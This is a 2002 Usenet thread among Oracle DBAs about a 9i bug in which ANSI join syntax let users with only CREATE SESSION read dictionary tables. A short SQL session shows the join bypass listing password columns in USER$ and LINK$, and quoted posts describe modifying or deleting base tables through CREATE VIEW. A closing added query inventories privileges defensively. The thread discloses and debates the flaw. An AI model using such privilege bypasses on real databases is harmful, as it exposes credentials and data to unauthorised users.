
Re: Oracle 9i DB Security Hole

From: Niall Litchfield <n-litchfield_at_audit-commission.gov.uk>
Date: Thu, 18 Apr 2002 09:02:29 +0100
Message-ID: <3cbe7d95$0$238$ed9e5944@reading.news.pipex.net>


Many users will not have 'create view' rights, meaning the creating of an updatable view is not available to them, so the ability to modify data will be absent in many cases. However, this is cold comfort.

SQL> grant create session to niall identified by password;

Grant succeeded.

SQL> conn niall/password
Connected.
SQL> select distinct a.table_name,a.column_name
  2 from dba_tab_columns a
  3 left outer join dba_tab_columns b
  4 on
  5 a.table_name=b.table_name
  6 and a.owner=b.owner
  7 where a.column_name like '%PASSWORD%';

TABLE_NAME                     COLUMN_NAME
------------------------------ --------------------
DBA_ROLES                      PASSWORD_REQUIRED
DBA_USERS                      PASSWORD
EXU7ROL                        PASSWORD
EXU8PHS                        PASSWORD
EXU8PHS                        PASSWORD_DATE
EXU8ROL                        PASSWORD
LINK$                          PASSWORD
USER$                          PASSWORD
USER_DB_LINKS                  PASSWORD
USER_HISTORY$                  PASSWORD
USER_HISTORY$                  PASSWORD_DATE

11 rows selected.

So a user with only Create Session privilege can read any data they like. In other words business data is entirely open to scrutiny by any user with create session privilege only.

--
Niall Litchfield
Oracle DBA
Audit Commission UK
*****************************************
Please include version and platform
and SQL where applicable
It makes life easier and increases the
likelihood of a good answer

******************************************

"Paul Vallee" <vallee+spam_at_pythian.com> wrote in message
news:bMlv8.17138$f5.1158259_at_news...

> Give me a break, Sybrand. This is not a *very specific* circumstance. We
> could all chase our salesreps, for all the good it would do! :-)
>
> So I'll make the assertion too: There is no security in 9i, at least not in
> any versions available to the public right now. Proof?
>
> Any user granted create session and create view can:
>
> 1) select any table in the database
> 2) insert into any table in the database
> 3) update any table in the database
> 4) delete from any table in the database.
>
> INCLUDING BASE TABLES. Easily trashing any oracle database... "Can't break
> it." uhhh, ya, we can.
>
> You would think there is still some security... that user couldn't easily
> create a trigger or a procedure, for example. Who cares? That user could
> insert the rows in the base tables granting themselves anything, if they
> knew how... it can't be that hard can it?
>
> Refer to Howard Rogers' post:
> http://groups.google.ca/groups?hl=en&selm=3CBBC7ED.5CC5241B%40oracle.com
>
> Notice how he deletes every row from sys.obj$ (!!!) with nothing except
> create session and create view.
>
> I'm sure Oracle will be providing an emergency fix shortly now that the
> extent of the problem is public, and they know of course that if the media
> picks up on this before the bugfix is available, it will cause widespread
> panic and confusion. :-)
>
> Cheers,
> Paul
> ---
> www.pythian.com -- vallee_at_pythian.com -- 877-PYTHIAN
> Smarter than adding another team member, Pythian has new services for
> supplementing DBAs: get our help with monitoring, 24x7 on-call, daily
> verifications, storage management, performance and more.
>
>
> "Sybrand Bakker" <postbus_at_sybrandb.demon.nl> wrote in message
> news:ubrm2s28t2ud70_at_corp.supernews.com...
> > Yeah I know.
> > But that is in a *very specific* circumstance
> > and for the OP it results in the bold assertion
> > there is 'no security in Oracle 9i'
> > Do you think that is true?
> > Then start chasing your salesrep immediately.
> >
> > Regards
> >
> >
> > --
> > Sybrand Bakker
> > Senior Oracle DBA
> >
> > to reply remove '-verwijderdit' from my e-mail address
> >
> >
> > "TurkBear" <jgreco1_at_mn.rr.com> wrote in message
> > news:mvbrbukv3lup4lan2i2frtea6gk5llls4m_at_4ax.com...
> > >
> > > Sybrand,
> > > As you often recommend, a search of Google for Security and 9i on the
> > > Oracle groups will show a reported bug that can, in
> > > some circumstances, allow users access to tables for which no privileges
> > > have been granted (in fact to any table)
> > > ...IIRC, it involves use of the new ANSI compliant join syntax...
> > > At this time there are 33 threads about this issue..
> > >
> > >
> > >
> > >
> > > Sybrand Bakker <postbus_at_sybrandb.demon.nl> wrote:
> > >
> > > >On 17 Apr 2002 09:37:18 -0700, mfowler_at_dot.co.pima.az.us (m. fowler)
> > > >wrote:
> > > >
> > > >>I think the 'bug' can be summarized thus: any user has read/write
> > > >>access to the data dictionary and any other user data. This can be
> > > >>rephrased like this: there is no security within the 9.0.1 database.
> > > >>The implications of this would seem to be rather profound.
> > > >
> > > >
> > > >any user has read/write
> > > >access to the data dictionary
> > > >
> > > >So what? Do you know of any other mechanism in Oracle to update the
> > > >dictionary for you?
> > > >
> > > >
> > > >and any other user data ....
> > > >there is no security within the 9.0.1 database.
> > > >
> > > >Could you please provide at least *some* proof? Obviously you can't.
> > > >
> > > >And if you can demonstrate this, why don't you get in touch with
> > > >Oracle on this issue? Or do you prefer to flame Oracle in public? That
> > > >would make you a coward, don't you think?
> > > >Or do you just like to be sued by Oracle for spreading such slander?
> > >
> > >
> > >
> >
> >
>
>
Received on Thu Apr 18 2002 - 03:02:29 CDT
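
The thread turns on two system privileges: CREATE SESSION alone for reading, and CREATE VIEW in addition for modifying data. The following is an added example, not part of any poster's message: an inventory query a DBA could run to see which accounts hold each privilege, whether granted directly, through PUBLIC, or through nested roles. It assumes a DBA account that can read the standard dictionary views DBA_USERS, DBA_SYS_PRIVS and DBA_ROLE_PRIVS; the column aliases are chosen here for illustration.

```sql
-- Added example (not from the thread): who can connect, and who can also
-- create views? Deliberately written with traditional (non-ANSI) joins.
SELECT username,
       MAX(DECODE(privilege, 'CREATE SESSION', 'Y', 'N'))   AS can_connect,
       MAX(DECODE(privilege, 'CREATE VIEW',     'Y',
                             'CREATE ANY VIEW', 'Y', 'N'))  AS can_create_view
FROM  (
        SELECT u.username, p.privilege
        FROM   dba_users u,
               dba_sys_privs p
        WHERE  p.privilege IN ('CREATE SESSION',
                               'CREATE VIEW',
                               'CREATE ANY VIEW')
        AND   (    p.grantee = u.username        -- granted directly
                OR p.grantee = 'PUBLIC'          -- granted to everyone
                OR p.grantee IN (                -- reached through roles,
                     SELECT granted_role         -- including roles granted
                     FROM   dba_role_privs       -- to other roles
                     START WITH grantee = u.username
                     CONNECT BY PRIOR granted_role = grantee)
              )
      )
GROUP  BY username
ORDER  BY can_create_view DESC, can_connect DESC, username;
```

Accounts showing Y in both columns match the "create session and create view" combination described in the quoted post; accounts with only can_connect = Y match the read-only case shown in the session above.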
